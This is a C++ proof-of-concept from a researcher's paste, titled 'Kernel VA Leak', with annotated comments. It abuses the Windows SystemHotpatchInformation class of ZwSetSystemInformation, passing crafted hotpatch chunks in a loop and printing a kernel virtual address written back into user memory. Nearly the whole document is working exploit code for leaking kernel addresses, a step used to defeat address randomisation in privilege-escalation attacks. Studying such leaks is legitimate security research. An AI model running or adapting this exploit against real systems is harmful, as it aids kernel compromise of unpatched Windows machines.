waliedassar

Kernel VA Leak

Apr 18th, 2013
  1. //http://waleedassar.blogspot.com
  2.  
  3.  
  4. #include "stdafx.h"
  5. #include "windows.h"
  6. #include "stdio.h"
  7.  
  8. #define SystemHotpatchInformation    0x45
  9.  
// Hand-written prototype for the native API call (the file is C++, hence the
// extern "C" wrapper so the name is not mangled and links against ntdll's export).
// Arguments, in order: information class, input buffer, input buffer length in
// bytes. The return value is an NTSTATUS; main() treats 0 (STATUS_SUCCESS) as
// the only success value.
extern "C"
{
    int __stdcall ZwSetSystemInformation(unsigned long,void*,unsigned long);
}
  14.  
  15.  
// A 64-bit value carried as two 32-bit halves, mirroring the LowPart/HighPart
// members of the Windows LARGE_INTEGER union. main() only ever fills Low; High
// stays zero from the memset of the request buffer.
struct LARGE_INTEGER_
{
    unsigned long Low;   // low 32 bits
    unsigned long High;  // high 32 bits
};
  21.  
// One entry of the SystemHotpatchInformation request. The kernel interprets
// this layout directly, so member order, widths and the trailing pad must be
// left exactly as they are. Field meanings below are the author's notes; they
// are not derivable from this file alone.
struct _HOTPATCH_CHUNK
{
    LARGE_INTEGER_ Address;       // author's note: the address to be probed, locked, mapped, etc.
    LARGE_INTEGER_ SourceAddress; // author's note: receives the mapped address, a system-wide kernel virtual address

    unsigned long SecondCompareOffset;   // author's note: set it to zero to leak
    unsigned long ByteCount;             // byte length of the region at Address; main() sets 0x1000
    unsigned long SecondCompareOffset_x; // author's note: set it to zero to leak
    unsigned long CompareOffset;         // author's note: set it to zero to leak
    unsigned long CompareSize;           // left at zero by main()
    unsigned long Pad4;                  // padding; left at zero by main()
};
  34.  
// Header of the buffer passed to ZwSetSystemInformation(SystemHotpatchInformation, ...):
// four 32-bit fields (16 bytes, the 0x10 main() adds to its size computation)
// followed by NumberOfChunks _HOTPATCH_CHUNK entries laid out back to back.
struct _HOTPATCH_INFO
{  
    unsigned long Flags;            // main() passes 0
        unsigned long Size;         // total byte size of the buffer, header plus chunks
        unsigned long NumberOfChunks;
        unsigned long pad0;         // left at zero by main()
    _HOTPATCH_CHUNK Chunk[1];       // declared with one element and indexed past it; main() allocates
                                    // room for NumberOfChunks entries (author: "You can increase it")
};
  43.  
void* pNops;            // 0x1000-byte user buffer that main() fills with 0x90 bytes (x86 NOP); every chunk's Address points at it
_HOTPATCH_INFO* pInput; // request buffer (header + chunks) handed to ZwSetSystemInformation; both are allocated by Alloc()
  46.  
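// Allocates the two buffers main() works with: a one-page (0x1000-byte)
// read/write buffer for pNops and a TotalSize-byte read/write request buffer
// for pInput.
//
// Returns true when both VirtualAlloc calls succeeded. On failure whatever was
// already allocated is released and BOTH globals are set to NULL, so callers
// that ignore the return value (the original signature was void) can still
// detect failure by testing the globals instead of dereferencing a NULL page.
bool Alloc(unsigned long TotalSize)
{
    // One page; matches the ByteCount main() advertises for every chunk.
    const unsigned long NopBufferSize = 0x1000;

    pNops = VirtualAlloc(0, NopBufferSize, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
    if (pNops == 0)
    {
        pInput = 0;
        return false;
    }

    pInput = (_HOTPATCH_INFO*)VirtualAlloc(0, TotalSize, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
    if (pInput == 0)
    {
        // Do not keep the first page around when the pair could not be completed.
        VirtualFree(pNops, 0, MEM_RELEASE);
        pNops = 0;
        return false;
    }

    return true;
}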
  55.  
  56.  
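// Entry point. Builds one SystemHotpatchInformation request in which every
// chunk describes the same 0x1000-byte NOP page, submits it to
// ZwSetSystemInformation, and after each successful call prints the two DWORDs
// found at offsets 0x1C and 0x18 of that page. The author presents those two
// values as a kernel virtual address written back into user memory (the
// "Kernel VA Leak" of the title); the offsets are taken as given here, this
// file does not derive them.
//
// As in the original, the loop never terminates; the process has to be killed.
// Returns 1 (without entering the loop) only when the buffers could not be
// allocated.
int main()
{
    const unsigned long NumberOfChunks = 0x650;
    // 16-byte header followed by NumberOfChunks+1 chunk entries; the +1 is the
    // trailing chunk the original filled in separately after its loop.
    const unsigned long TotalSize = ((NumberOfChunks + 1) * sizeof(_HOTPATCH_CHUNK)) + 0x10;
    // %lx: TotalSize is unsigned long, the original's %x mismatched the argument type.
    printf("Total Size is %lx\r\n", TotalSize);

    Alloc(TotalSize);
    if (pNops == 0 || pInput == 0)
    {
        // The original went straight on to memset() and would have dereferenced
        // a NULL pointer when VirtualAlloc failed.
        printf("Allocation failed\r\n");
        return 1;
    }

    while (1)
    {
        memset(pNops, 0x90, 0x1000);
        memset(pInput, 0, TotalSize);
        pInput->Flags = 0;
        pInput->Size = TotalSize;
        pInput->NumberOfChunks = NumberOfChunks + 1;

        // All NumberOfChunks+1 entries (the trailing one included; it received
        // identical values in the original) point at the NOP page.
        // NOTE(review): only Address.Low is set, so this assumes a 32-bit build
        // where the pointer fits in 32 bits; Address.High stays zero from the memset.
        for (unsigned long i = 0; i <= NumberOfChunks; i++)
        {
            pInput->Chunk[i].Address.Low = (unsigned long)pNops;
            pInput->Chunk[i].ByteCount = 0x1000;
        }

        int ret = ZwSetSystemInformation(SystemHotpatchInformation, pInput, TotalSize);
        printf("Return value is %x\r\n", (unsigned)ret);
        if (ret == 0)
        {
            // The original printed these with %p while passing unsigned long
            // arguments, a format/argument mismatch; print them as fixed-width
            // hex instead. Order (0x1C first, then 0x18, backtick-separated) is
            // kept from the original, which presumably follows the debugger's
            // high`low notation for a 64-bit value.
            const unsigned char* base = (const unsigned char*)pNops;
            unsigned long first = *(const unsigned long*)(base + 0x1C);
            unsigned long second = *(const unsigned long*)(base + 0x18);
            printf("Leaked address is %08lx`%08lx\r\n", first, second);
        }
    }

    return 0;
}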